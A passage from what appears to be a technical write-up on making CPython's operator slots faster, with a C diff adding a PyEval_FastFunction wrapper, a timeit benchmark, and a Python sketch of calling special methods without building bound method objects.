@@ -4329,6 +4329,12 @@ call_function(PyObject ***pp_stack, int oparg
     return x;
 }
 
+PyAPI_FUNC(PyObject *)
+PyEval_FastFunction(PyObject *func, PyObject **stack, int n)
+{
+    return fast_function(func, &stack, n, n, 0);
+}
+
 /* The fast_function() function optimize calls for which no argument
    tuple is necessary; the objects are passed directly from the stack.
    For the simplest case -- a function that takes only positional
```
With this extra optimisation, we're down from 0.113 usec to 0.0972 usec:
```
$ make python.exe
...
$ ./python.exe -mtimeit -s 'from x import A; a = A(); b = A()' 'a + b'
10000000 loops, best of 3: 0.0972 usec per loop
```
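Eliding the method object can likewise be sketched in Python. The helper name `call_maybe_direct` is hypothetical, and the code simplifies the C patch: it looks the name up on the type, calls a plain function directly with `(o, p)`, and only falls back to descriptor binding for other kinds of attribute.

```python
import types


class A:
    # Assumed stand-in for the benchmark class; __add__ returns 42.
    def __add__(self, other):
        return 42


def call_maybe_direct(o, name, p):
    """Hypothetical analogue of call_maybe that skips method creation."""
    # Approximates _PyType_LookupId: walk the MRO of type(o).
    for klass in type(o).__mro__:
        if name in klass.__dict__:
            func = klass.__dict__[name]
            break
    else:
        return NotImplemented
    if isinstance(func, types.FunctionType):
        # Fast path: no bound method is ever constructed.
        return func(o, p)
    # Slow path: bind through the descriptor protocol, if the type has one.
    getter = getattr(type(func), "__get__", None)
    if getter is not None:
        func = getter(func, o, type(o))
    return func(p)


print(call_maybe_direct(A(), "__add__", A()))
print(call_maybe_direct(3, "__add__", 4))
```

Looking up on the type rather than the instance matches how operator slots resolve special methods, which is why an `__add__` stored in an instance dictionary would be ignored here.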
In conclusion, slots don't need to be slow - the above diff makes them fast (at least for some binary operators; applying similar transformations to other slots is left as an exercise to the reader).